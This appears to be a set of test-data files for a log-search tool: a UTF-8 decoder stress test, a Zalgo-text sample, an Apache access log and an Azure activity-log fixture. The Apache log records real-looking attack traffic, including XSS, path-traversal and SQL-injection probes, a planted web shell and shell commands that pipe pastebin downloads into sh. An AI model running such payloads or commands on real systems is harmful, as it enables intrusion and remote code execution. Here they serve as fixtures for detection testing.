("/") should be rejected | 205 | like a malformed UTF-8 sequence, for instance by substituting it with | 206 | a replacement character. If you see a slash below, you do not have a | 207 | safe UTF-8 decoder! | 208 | | 209 | 4.1.1 U+002F = c0 af = "��" | 210 | 4.1.2 U+002F = e0 80 af = "���" | 211 | 4.1.3 U+002F = f0 80 80 af = "����" | 212 | 4.1.4 U+002F = f8 80 80 80 af = "�����" | 213 | 4.1.5 U+002F = fc 80 80 80 80 af = "������" | 214 | | 215 | 4.2 Maximum overlong sequences | 216 | | 217 | Below you see the highest Unicode value that is still resulting in an | 218 | overlong sequence if represented with the given number of bytes. This | 219 | is a boundary test for safe UTF-8 decoders. All five characters should | 220 | be rejected like malformed UTF-8 sequences. | 221 | | 222 | 4.2.1 U-0000007F = c1 bf = "��" | 223 | 4.2.2 U-000007FF = e0 9f bf = "���" | 224 | 4.2.3 U-0000FFFF = f0 8f bf bf = "����" | 225 | 4.2.4 U-001FFFFF = f8 87 bf bf bf = "�����" | 226 | 4.2.5 U-03FFFFFF = fc 83 bf bf bf bf = "������" | 227 | | 228 | 4.3 Overlong representation of the NUL character | 229 | | 230 | The following five sequences should also be rejected like malformed | 231 | UTF-8 sequences and should not be treated like the ASCII NUL | 232 | character. | 233 | | 234 | 4.3.1 U+0000 = c0 80 = "��" | 235 | 4.3.2 U+0000 = e0 80 80 = "���" | 236 | 4.3.3 U+0000 = f0 80 80 80 = "����" | 237 | 4.3.4 U+0000 = f8 80 80 80 80 = "�����" | 238 | 4.3.5 U+0000 = fc 80 80 80 80 80 = "������" | 239 | | 240 | 5 Illegal code positions | 241 | | 242 | The following UTF-8 sequences should be rejected like malformed | 243 | sequences, because they never represent valid ISO 10646 characters and | 244 | a UTF-8 decoder that accepts them might introduce security problems | 245 | comparable to overlong UTF-8 sequences. 
| 246 | | 247 | 5.1 Single UTF-16 surrogates | 248 | | 249 | 5.1.1 U+D800 = ed a0 80 = "���" | 250 | 5.1.2 U+DB7F = ed ad bf = "���" | 251 | 5.1.3 U+DB80 = ed ae 80 = "���" | 252 | 5.1.4 U+DBFF = ed af bf = "���" | 253 | 5.1.5 U+DC00 = ed b0 80 = "���" | 254 | 5.1.6 U+DF80 = ed be 80 = "���" | 255 | 5.1.7 U+DFFF = ed bf bf = "���" | 256 | | 257 | 5.2 Paired UTF-16 surrogates | 258 | | 259 | 5.2.1 U+D800 U+DC00 = ed a0 80 ed b0 80 = "������" | 260 | 5.2.2 U+D800 U+DFFF = ed a0 80 ed bf bf = "������" | 261 | 5.2.3 U+DB7F U+DC00 = ed ad bf ed b0 80 = "������" | 262 | 5.2.4 U+DB7F U+DFFF = ed ad bf ed bf bf = "������" | 263 | 5.2.5 U+DB80 U+DC00 = ed ae 80 ed b0 80 = "������" | 264 | 5.2.6 U+DB80 U+DFFF = ed ae 80 ed bf bf = "������" | 265 | 5.2.7 U+DBFF U+DC00 = ed af bf ed b0 80 = "������" | 266 | 5.2.8 U+DBFF U+DFFF = ed af bf ed bf bf = "������" | 267 | | 268 | 5.3 Noncharacter code positions | 269 | | 270 | The following "noncharacters" are "reserved for internal use" by | 271 | applications, and according to older versions of the Unicode Standard | 272 | "should never be interchanged". Unicode Corrigendum #9 dropped the | 273 | latter restriction. Nevertheless, their presence in incoming UTF-8 data | 274 | can remain a potential security risk, depending on what use is made of | 275 | these codes subsequently. Examples of such internal use: | 276 | | 277 | - Some file APIs with 16-bit characters may use the integer value -1 | 278 | = U+FFFF to signal an end-of-file (EOF) or error condition. | 279 | | 280 | - In some UTF-16 receivers, code point U+FFFE might trigger a | 281 | byte-swap operation (to convert between UTF-16LE and UTF-16BE). | 282 | | 283 | With such internal use of noncharacters, it may be desirable and safer | 284 | to block those code points in UTF-8 decoders, as they should never | 285 | occur legitimately in incoming UTF-8 data, and could trigger unsafe | 286 | behaviour in subsequent processing. | 287 | | 288 | Particularly problematic noncharacters in 16-bit applications: | 289 | | 290 | 5.3.1 U+FFFE = ef bf be = "￾" | 291 | 5.3.2 U+FFFF = ef bf bf = "￿" | 292 | | 293 | Other noncharacters: | 294 | | 295 | 5.3.3 U+FDD0 .. U+FDEF = "﷐﷑﷒﷓﷔﷕﷖﷗﷘﷙﷚﷛﷜﷝﷞﷟﷠﷡﷢﷣﷤﷥﷦﷧﷨﷩﷪﷫﷬﷭﷮﷯"| 296 | | 297 | 5.3.4 U+nFFFE U+nFFFF (for n = 1..10) | 298 | | 299 | "🿾🿿𯿾𯿿𿿾𿿿񏿾񏿿񟿾񟿿񯿾񯿿񿿾񿿿򏿾򏿿 | 300 | 򟿾򟿿򯿾򯿿򿿾򿿿󏿾󏿿󟿾󟿿󯿾󯿿󿿾󿿿􏿾􏿿" | 301 | | 302 | THE END | 303 | -------------------------------------------------------------------------------- /tests/data/UTF-8-test_filename_ŀĔ_TH̘Ë͖́̉ ͠P̯͍̭O̚​N̐Y̡ H̸̡̪̯ͨ͊̽̅̾̎Ȩ̬̩̾͛ͪ̈́̀́͘ ̶̧̨̱̹̭̯ͧ̾ͬC̷̙̲̝͖ͭ̏ͥͮ͟Oͮ͏̮̪̝͍M̲̖͊̒ͪͩͬ̚̚͜Ȇ̴̟̟͙̞ͩ͌͝S̨̥̫͎̭ͯ̿̔̀ͅ.txt: -------------------------------------------------------------------------------- 1 | 2021-07-07T16:46:30.000ZUTF-8 decoder capability and stress test INFO Starting up agent subsystem INFO [ssm-session-worker]User name,AWS access key,Event time"serviceName": "guardduty""schemaVersion" 2 | ---------------------------------------- 3 | 4 | 5 | You can't parse [X]HTML with regex. Because HTML can't be parsed by regex. Regex is not a tool that can be used to correctly parse HTML. As I have answered in HTML-and-regex questions here so many times before, the use of regex will not allow you to consume HTML. Regular expressions are a tool that is insufficiently sophisticated to understand the constructs employed by HTML. HTML is not a regular language and hence cannot be parsed by regular expressions. Regex queries are not equipped to break down HTML into its meaningful parts. so many times but it is not getting to me. 
Even enhanced irregular regular expressions as used by Perl are not up to the task of parsing HTML. You will never make me crack. HTML is a language of sufficient complexity that it cannot be parsed by regular expressions. Even Jon Skeet cannot parse HTML using regular expressions. Every time you attempt to parse HTML with regular expressions, the unholy child weeps the blood of virgins, and Russian hackers pwn your webapp. Parsing HTML with regex summons tainted souls into the realm of the living. HTML and regex go together like love, marriage, and ritual infanticide. The
cannot hold it is too late. The force of regex and HTML together in the same conceptual space will destroy your mind like so much watery putty. If you parse HTML with regex you are giving in to Them and their blasphemous ways which doom us all to inhuman toil for the One whose Name cannot be expressed in the Basic Multilingual Plane, he comes. HTML-plus-regexp will liquify the n​erves of the sentient whilst you observe, your psyche withering in the onslaught of horror. Rege̿̔̉x-based HTML parsers are the cancer that is killing StackOverflow it is too late it is too late we cannot be saved the transgression of a chi͡ld ensures regex will consume all living tissue (except for HTML which it cannot, as previously prophesied) dear lord help us how can anyone survive this scourge using regex to parse HTML has doomed humanity to an eternity of dread torture and security holes using regex as a tool to process HTML establishes a breach between this world and the dread realm of c͒ͪo͛ͫrrupt entities (like SGML entities, but more corrupt) a mere glimpse of the world of reg​ex parsers for HTML will ins​tantly transport a programmer's consciousness into a world of ceaseless screaming, he comes, the pestilent slithy regex-infection wil​l devour your HT​ML parser, application and existence for all time like Visual Basic only worse he comes he comes do not fi​ght he com̡e̶s, ̕h̵i​s un̨ho͞ly radiańcé destro҉ying all enli̍̈́̂̈́ghtenment, HTML tags lea͠ki̧n͘g fr̶ǫm ̡yo​͟ur eye͢s̸ ̛l̕ik͏e liq​uid pain, the song of re̸gular exp​ression parsing will exti​nguish the voices of mor​tal man from the sp​here I can see it can you see ̲͚̖͔̙î̩́t̲͎̩̱͔́̋̀ it is beautiful t​he final snuffing of the lie​s of Man ALL IS LOŚ͖̩͇̗̪̏̈́T ALL I​S LOST the pon̷y he comes he c̶̮omes he comes the ich​or permeates all MY FACE MY FACE ᵒh god no NO NOO̼O​O NΘ stop the an​*̶͑̾̾​̅ͫ͏̙̤g͇̫͛͆̾ͫ̑͆l͖͉̗̩̳̟̍ͫͥͨe̠̅s ͎a̧͈͖r̽̾̈́͒͑e n​ot rè̑ͧ̌aͨl̘̝̙̃ͤ͂̾̆ ZA̡͊͠͝LGΌ ISͮ̂҉̯͈͕̹̘̱ TO͇̹̺ͅƝ̴ȳ̳ TH̘Ë͖́̉ ͠P̯͍̭O̚​N̐Y̡ H̸̡̪̯ͨ͊̽̅̾̎Ȩ̬̩̾͛ͪ̈́̀́͘ ̶̧̨̱̹̭̯ͧ̾ͬC̷̙̲̝͖ͭ̏ͥͮ͟Oͮ͏̮̪̝͍M̲̖͊̒ͪͩͬ̚̚͜Ȇ̴̟̟͙̞ͩ͌͝S̨̥̫͎̭ͯ̿̔̀ͅ 6 | Markus Kuhn - 2015-08-28 - CC BY 4.0 7 | 8 | This test file can help you examine, how your UTF-8 decoder handles 9 | various types of correct, malformed, or otherwise interesting UTF-8 10 | sequences. This file is not meant to be a conformance test. It does 11 | not prescribe any particular outcome. Therefore, there is no way to 12 | "pass" or "fail" this test file, even though the text does suggest a 13 | preferable decoder behaviour at some places. Its aim is, instead, to 14 | help you think about, and test, the behaviour of your UTF-8 decoder on a 15 | systematic collection of unusual inputs. Experience so far suggests 16 | that most first-time authors of UTF-8 decoders find at least one 17 | serious problem in their decoder using this file. 18 | 19 | The test lines below cover boundary conditions, malformed UTF-8 20 | sequences, as well as correctly encoded UTF-8 sequences of Unicode code 21 | points that should never occur in a correct UTF-8 file. 22 | 23 | According to ISO 10646-1:2000, sections D.7 and 2.3c, a device 24 | receiving UTF-8 shall interpret a "malformed sequence in the same way 25 | that it interprets a character that is outside the adopted subset" and 26 | "characters that are not within the adopted subset shall be indicated 27 | to the user" by a receiving device. 
One commonly used approach in 28 | UTF-8 decoders is to replace any malformed UTF-8 sequence by a 29 | replacement character (U+FFFD), which looks a bit like an inverted 30 | question mark, or a similar symbol. It might be a good idea to 31 | visually distinguish a malformed UTF-8 sequence from a correctly 32 | encoded Unicode character that is just not available in the current 33 | font but otherwise fully legal, even though ISO 10646-1 doesn't 34 | mandate this. In any case, just ignoring malformed sequences or 35 | unavailable characters does not conform to ISO 10646, will make 36 | debugging more difficult, and can lead to user confusion. 37 | 38 | Please check, whether a malformed UTF-8 sequence is (1) represented at 39 | all, (2) represented by exactly one single replacement character (or 40 | equivalent signal), and (3) the following quotation mark after an 41 | illegal UTF-8 sequence is correctly displayed, i.e. proper 42 | resynchronization takes place immediately after any malformed 43 | sequence. This file says "THE END" in the last line, so if you don't 44 | see that, your decoder crashed somehow before, which should always be 45 | cause for concern. 46 | 47 | All lines in this file are exactly 79 characters long (plus the line 48 | feed). In addition, all lines end with "|", except for the two test 49 | lines 2.1.1 and 2.2.1, which contain non-printable ASCII controls 50 | U+0000 and U+007F. If you display this file with a fixed-width font, 51 | these "|" characters should all line up in column 79 (right margin). 52 | This allows you to test quickly, whether your UTF-8 decoder finds the 53 | correct number of characters in every line, that is whether each 54 | malformed sequences is replaced by a single replacement character. 55 | 56 | Note that, as an alternative to the notion of malformed sequence used 57 | here, it is also a perfectly acceptable (and in some situations even 58 | preferable) solution to represent each individual byte of a malformed 59 | sequence with a replacement character. If you follow this strategy in 60 | your decoder, then please ignore the "|" column. 
61 | 62 | 63 | Here come the tests: | 64 | | 65 | 1 Some correct UTF-8 text | 66 | | 67 | You should see the Greek word 'kosme': "κόσμε" | 68 | | 69 | 2 Boundary condition test cases | 70 | | 71 | 2.1 First possible sequence of a certain length | 72 | | 73 | 2.1.1 1 byte (U-00000000): " -------------------------------------------------------------------------------- /tests/data/apache_access.log: -------------------------------------------------------------------------------- 1 | 86.166.103.163 - - [19/Jul/2020:20:14:39 +0000] "GET / HTTP/1.1" 200 3380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36" 2 | 86.166.103.163 - - [19/Jul/2020:20:14:39 +0000] "GET /icons/openlogo-75.png HTTP/1.1" 200 6040 "http://ec2-3-90-82-218.compute-1.amazonaws.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36" 3 | 86.166.103.163 - - [19/Jul/2020:20:14:39 +0000] "GET /favicon.ico HTTP/1.1" 404 517 "http://ec2-3-90-82-218.compute-1.amazonaws.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36" 4 | 86.166.103.163 - - [19/Jul/2020:20:16:34 +0000] "GET / HTTP/1.1" 200 3380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36" 5 | 86.166.103.163 - - [19/Jul/2020:20:16:37 +0000] "GET /test.php HTTP/1.1" 200 204 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36" 6 | 86.166.103.163 - - [19/Jul/2020:20:39:04 +0000] "GET / HTTP/1.1" 200 3380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36" 7 | 40.76.227.225 - - [19/Jul/2020:20:39:21 +0000] "GET / HTTP/1.1" 200 3380 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36" 8 | 40.76.227.225 - - [19/Jul/2020:20:39:22 +0000] "GET /wp-links-opml.php?user-agent=Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10_11_6%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F53.0.2785.143+Safari%2F537.36 HTTP/1.1" 500 185 "-" "python-requests/2.23.0" 9 | 40.76.227.225 - - [19/Jul/2020:20:39:22 +0000] "GET /wp-content/themes/???/style.css HTTP/1.1" 200 203 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36" 10 | 45.76.91.240 - - [19/Jul/2020:20:39:27 +0000] "HEAD / HTTP/1.1" 200 255 "-" "-" 11 | 54.165.221.210 - - [19/Jul/2020:20:39:33 +0000] "GET / HTTP/1.1" 200 3324 "https://sucuri.net" "Mozilla/5.0 SomeLine (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" 12 | 54.165.221.210 - - [19/Jul/2020:20:39:33 +0000] "TRACE / HTTP/1.1" 405 506 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36" 13 | 54.165.221.210 - - [19/Jul/2020:20:39:33 +0000] "GET /.git/HEAD HTTP/1.1" 404 462 "https://sucuri.net" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" 14 | 54.165.221.210 - - [19/Jul/2020:20:39:33 +0000] "GET /404javascript.js HTTP/1.1" 404 462 "https://www.google.com/url/?sa=t" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" 15 | 54.165.221.210 - - [19/Jul/2020:20:39:33 +0000] "GET /404testpage4525d2fdc HTTP/1.1" 404 462 "https://sucuri.net" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" 16 | 
54.165.221.210 - - [19/Jul/2020:20:39:33 +0000] "GET / HTTP/1.1" 200 3324 "https://www.google.com/images/url" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 17 | 54.165.221.210 - - [19/Jul/2020:20:39:33 +0000] "GET /manual HTTP/1.1" 404 462 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 18 | 54.165.221.210 - - [19/Jul/2020:20:39:33 +0000] "GET / HTTP/1.1" 200 3324 "-" "Mozilla/5.0 (iPad; CPU OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" 19 | 209.250.238.112 - - [19/Jul/2020:20:39:46 +0000] "GET / HTTP/1.1" 200 3324 "http://ec2-3-90-82-218.compute-1.amazonaws.com/" "Mozilla/5.0 (compatible; WPSec/1.3; +https://wpsec.com)" 20 | 209.250.238.112 - - [19/Jul/2020:20:39:46 +0000] "GET / HTTP/1.1" 200 3324 "http://ec2-3-90-82-218.compute-1.amazonaws.com/" "Mozilla/5.0 (compatible; WPSec/1.3; +https://wpsec.com)" 21 | 209.250.238.112 - - [19/Jul/2020:20:39:46 +0000] "HEAD / HTTP/1.1" 200 283 "http://ec2-3-90-82-218.compute-1.amazonaws.com/" "Mozilla/5.0 (compatible; WPSec/1.3; +https://wpsec.com)" 22 | 209.250.238.112 - - [19/Jul/2020:20:39:46 +0000] "GET /2d1983f.html HTTP/1.1" 404 462 "http://ec2-3-90-82-218.compute-1.amazonaws.com/" "Mozilla/5.0 (compatible; WPSec/1.3; +https://wpsec.com)" 23 | 209.250.238.112 - - [19/Jul/2020:20:39:46 +0000] "HEAD /wp-content/ HTTP/1.1" 200 128 "http://ec2-3-90-82-218.compute-1.amazonaws.com/" "Mozilla/5.0 (compatible; WPSec/1.3; +https://wpsec.com)" 24 | 209.250.238.112 - - [19/Jul/2020:20:40:00 +0000] "GET / HTTP/1.1" 200 3380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3770.100 Safari/537.36" 25 | 209.250.238.112 - - [19/Jul/2020:20:40:00 +0000] "GET /?a=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E&c=..%2F..%2F..%2F..%2Fetc%2Fpasswd&b=UNION+SELECT+ALL+FROM+information_schema+AND+%27+or+SLEEP%285%29+or+%27 HTTP/1.1" 200 3380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3770.100 Safari/537.36" 26 | 209.250.238.112 - - [19/Jul/2020:20:40:00 +0000] "GET / HTTP/1.1" 200 3380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3770.100 Safari/537.36" 27 | 209.250.238.112 - - [19/Jul/2020:20:40:01 +0000] "GET / HTTP/1.1" 200 3380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3770.100 Safari/537.36" 28 | 209.250.238.112 - - [19/Jul/2020:20:40:01 +0000] "GET /?s=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E HTTP/1.1" 200 3380 "-" "python-requests/2.22.0" 29 | 209.250.238.112 - - [19/Jul/2020:20:40:01 +0000] "GET / HTTP/1.1" 200 3380 "-" "python-requests/2.22.0" 30 | 209.250.238.112 - - [19/Jul/2020:20:40:01 +0000] "GET /?s=UNION+SELECT+ALL+FROM+information_schema+AND+%27+or+SLEEP%285%29+or+%27 HTTP/1.1" 200 3380 "-" "python-requests/2.22.0" 31 | 185.220.101.194 - - [19/Jul/2020:20:40:41 +0000] "GET / HTTP/1.1" 200 3380 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 32 | 185.220.101.194 - - [19/Jul/2020:20:40:41 +0000] "GET /icons/openlogo-75.png HTTP/1.1" 200 6040 "http://ec2-3-90-82-218.compute-1.amazonaws.com/" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 33 | 185.220.101.194 - - [19/Jul/2020:20:40:41 +0000] "GET /favicon.ico HTTP/1.1" 404 518 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 34 | 185.220.101.194 - - [19/Jul/2020:20:41:24 +0000] "GET /wp-content 
HTTP/1.1" 301 666 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 35 | 185.220.101.194 - - [19/Jul/2020:20:41:25 +0000] "GET /wp-content/ HTTP/1.1" 200 736 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 36 | 185.220.101.194 - - [19/Jul/2020:20:41:25 +0000] "GET /icons/blank.gif HTTP/1.1" 200 431 "http://ec2-3-90-82-218.compute-1.amazonaws.com/wp-content/" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 37 | 185.220.101.194 - - [19/Jul/2020:20:41:25 +0000] "GET /icons/back.gif HTTP/1.1" 200 500 "http://ec2-3-90-82-218.compute-1.amazonaws.com/wp-content/" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 38 | 185.220.101.194 - - [19/Jul/2020:20:41:25 +0000] "GET /icons/folder.gif HTTP/1.1" 200 509 "http://ec2-3-90-82-218.compute-1.amazonaws.com/wp-content/" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 39 | 185.220.101.194 - - [19/Jul/2020:20:41:27 +0000] "GET /wp-content/plugins/ HTTP/1.1" 200 787 "http://ec2-3-90-82-218.compute-1.amazonaws.com/wp-content/" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 40 | 185.220.101.194 - - [19/Jul/2020:20:41:27 +0000] "GET /icons/unknown.gif HTTP/1.1" 200 528 "http://ec2-3-90-82-218.compute-1.amazonaws.com/wp-content/plugins/" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 41 | 185.220.101.194 - - [19/Jul/2020:20:41:29 +0000] "GET /wp-content/plugins/wordpress_uploader.php HTTP/1.1" 200 480 "http://ec2-3-90-82-218.compute-1.amazonaws.com/wp-content/plugins/" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 42 | 185.220.101.194 - - [19/Jul/2020:20:42:18 +0000] "POST /wp-content/plugins/wordpress_uploader.php HTTP/1.1" 200 494 "http://ec2-3-90-82-218.compute-1.amazonaws.com/wp-content/plugins/wordpress_uploader.php" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 43 | 185.220.101.194 - - [19/Jul/2020:20:42:24 +0000] "POST /wp-content/plugins/wordpress_uploader.php HTTP/1.1" 200 494 "http://ec2-3-90-82-218.compute-1.amazonaws.com/wp-content/plugins/wordpress_uploader.php" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 44 | 185.220.101.194 - - [19/Jul/2020:20:42:30 +0000] "POST /wp-content/plugins/wordpress_uploader.php HTTP/1.1" 200 499 "http://ec2-3-90-82-218.compute-1.amazonaws.com/wp-content/plugins/wordpress_uploader.php" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 45 | 185.220.101.194 - - [19/Jul/2020:20:42:34 +0000] "POST /wp-content/plugins/wordpress_uploader.php HTTP/1.1" 200 504 "http://ec2-3-90-82-218.compute-1.amazonaws.com/wp-content/plugins/wordpress_uploader.php" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 46 | 185.220.101.194 - - [19/Jul/2020:20:43:04 +0000] "GET /wp-content/plugins/uploads HTTP/1.1" 301 698 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 47 | 185.220.101.194 - - [19/Jul/2020:20:43:05 +0000] "GET /wp-content/plugins/uploads/ HTTP/1.1" 200 792 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 48 | 185.220.101.194 - - [19/Jul/2020:20:43:05 +0000] "GET /icons/text.gif HTTP/1.1" 200 512 "http://ec2-3-90-82-218.compute-1.amazonaws.com/wp-content/plugins/uploads/" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 49 | 185.220.101.194 - - [19/Jul/2020:20:43:05 +0000] "GET /icons/image2.gif HTTP/1.1" 200 594 "http://ec2-3-90-82-218.compute-1.amazonaws.com/wp-content/plugins/uploads/" "Mozilla/5.0 
(Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 50 | 185.220.101.194 - - [19/Jul/2020:20:43:07 +0000] "GET /wp-content/plugins/uploads/a.php HTTP/1.1" 200 384 "http://ec2-3-90-82-218.compute-1.amazonaws.com/wp-content/plugins/uploads/" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 51 | 185.220.101.194 - - [19/Jul/2020:20:43:07 +0000] "GET /wp-content/plugins/uploads/a.php HTTP/1.1" 200 384 "http://ec2-3-90-82-218.compute-1.amazonaws.com/wp-content/plugins/uploads/" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 52 | 185.220.101.194 - - [19/Jul/2020:20:43:45 +0000] "GET /wp-content/plugins/uploads/a.php?cmd=curl%20https://pastebin.com/raw/NKnTWdsk%20|%20sh HTTP/1.1" 200 392 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 53 | 185.220.101.194 - - [19/Jul/2020:20:44:08 +0000] "GET /wp-content/plugins/uploads/a.php?cmd=curl%20http://pastebin.com/raw/rsdzW7C7%20|%20sh HTTP/1.1" 200 392 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 54 | 185.220.101.194 - - [19/Jul/2020:20:46:20 +0000] "GET / HTTP/1.1" 200 3380 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 55 | -------------------------------------------------------------------------------- /tests/data/azure.json: -------------------------------------------------------------------------------- 1 | [ 2 | { 3 | "data": { 4 | "authorization": { 5 | "action": "Microsoft.Storage/storageAccounts/listKeys/action", 6 | "scope": "/subscriptions/ji12gbh3jh12b3h12vb3hv123h/resourceGroups/test/providers/Microsoft.Storage/storageAccounts/storagetest" 7 | }, 8 | "caller": "test@email", 9 | "channels": "Operation", 10 | "claims": { 11 | "aud": "https://management.core.windows.net/", 12 | "ver": "1.0", 13 | "xms_cae": "1", 14 | "xms_tcdt": "1231293743" 15 | }, 16 | "correlationId": "b12321j3bhdgscj214j3b12rhv", 17 | "description": "", 18 | "eventDataId": "21371283ghjgfsdb9876123", 19 | "eventName": { 20 | "value": "EndRequest", 21 | "localizedValue": "End request" 22 | }, 23 | "httpRequest": { 24 | "clientRequestId": "9dsfghj1290-381293ghu123gvh123", 25 | "clientIpAddress": "11.11.11.10", 26 | "method": "POST", 27 | "uri": "https://management.azure.com/subscriptions/12937812uhg3uhj2qwgrfbhsdfgb138294e12ugv/resourceGroups/Test/providers/Microsoft.Storage/storageAccounts/storagetest/listKeys?api-version=2022-05-01" 28 | }, 29 | "id": "/subscriptions/12937812uhg3uhj2qwgrfbhsdfgb138294e12ugv/resourceGroups/Test/providers/Microsoft.Storage/storageAccounts/storagetest/events/21371283ghjgfsdb9876123/ticks/2193871283612873612", 30 | "level": "Informational", 31 | "resourceGroupName": "Test", 32 | "resourceProviderName": { 33 | "value": "Microsoft.Storage", 34 | "localizedValue": "Microsoft.Storage" 35 | }, 36 | "resourceId": "/subscriptions/12937812uhg3uhj2qwgrfbhsdfgb138294e12ugv/resourceGroups/Test/providers/Microsoft.Storage/storageAccounts/storagetest", 37 | "operationId": "ac8a903f-315d-421a-8533-84ed10b356cd", 38 | "operationName": { 39 | "value": "Microsoft.Storage/storageAccounts/listKeys/action", 40 | "localizedValue": "List Storage Account Keys" 41 | }, 42 | "status": { 43 | "value": "Succeeded", 44 | "localizedValue": "Succeeded" 45 | }, 46 | "subStatus": { 47 | "value": "OK", 48 | "localizedValue": "OK (HTTP Status Code: 200)" 49 | }, 50 | "tenantId": "12321MN3BNDASVBfD09SFDGSD" 51 | }, 52 | "version": 1, 53 | "eventId": "21371283ghjgfsdb9876123", 54 | "eventType": "AZURE_CLOUD" 55 | } 56 | ] 
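The azure.json fixture above mirrors an Azure Activity Log export: a top-level JSON array whose single event nests its useful fields under "data". As a rough illustration of why the tests below treat such files as structured JSON rather than plain text lines, here is a small standalone sketch (the helper name and the regex-based matching are assumptions for illustration, not cloudgrep's implementation) that re-serializes each record so nested values such as data.httpRequest.method stay reachable from a flat query:

import json
import re
from typing import Any, List

def search_json_records(path: str, pattern: str) -> List[Any]:
    # The fixture is a top-level JSON array of event records
    with open(path) as f:
        records = json.load(f)
    # Re-serialize each record so nested values (e.g. the "listKeys" action
    # under data.authorization) can be hit by a flat regex/substring query
    return [record for record in records if re.search(pattern, json.dumps(record))]

print(len(search_json_records("tests/data/azure.json", "listKeys")))  # -> 1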
